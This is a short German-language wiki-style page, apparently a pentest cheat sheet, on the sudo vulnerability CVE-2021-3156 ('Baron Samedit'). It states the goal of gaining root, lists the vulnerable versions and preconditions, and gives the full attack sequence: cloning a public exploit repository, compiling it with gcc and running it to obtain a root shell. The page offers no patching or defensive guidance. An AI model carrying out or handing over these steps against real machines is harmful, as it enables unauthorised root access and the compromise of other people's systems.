CVE-2021-3156
Zur Navigation springen
Zur Suche springen
Privilege Escalation über sudo: CVE-2021-3156 ("Baron Samedit")
Zielsetzung
- Root-Rechte durch eine Schwachstelle im sudo-Programm erlangen.
Wie entdeckt man die Schwachstelle?
- sudo-Version prüfen
- sudo --version
- Verwundbare Versionen
- Sudo <= 1.9.5p2 ist verwundbar.
Voraussetzungen
| Bedingung | Beschreibung |
|---|---|
| sudo-Version | <= 1.9.5p2 |
| Lokaler Benutzer | Zugriff auf sudo installiert |
| shell Zugriff | Vorhanden |
Angriff: Root-Rechte durch Exploit
- Exploit herunterladen
- git clone https://github.com/blasty/CVE-2021-3156.git
- cd CVE-2021-3156
- Exploit kompilieren
- gcc exploit.c -o sudo_exploit
- Exploit ausführen
- ./sudo_exploit
- Erwartung
- Root-Shell erhalten.
Hinweise
- Exploit kann je nach libc-Version angepasst werden müssen.
- Bei Erfolg direkte Root-Rechte.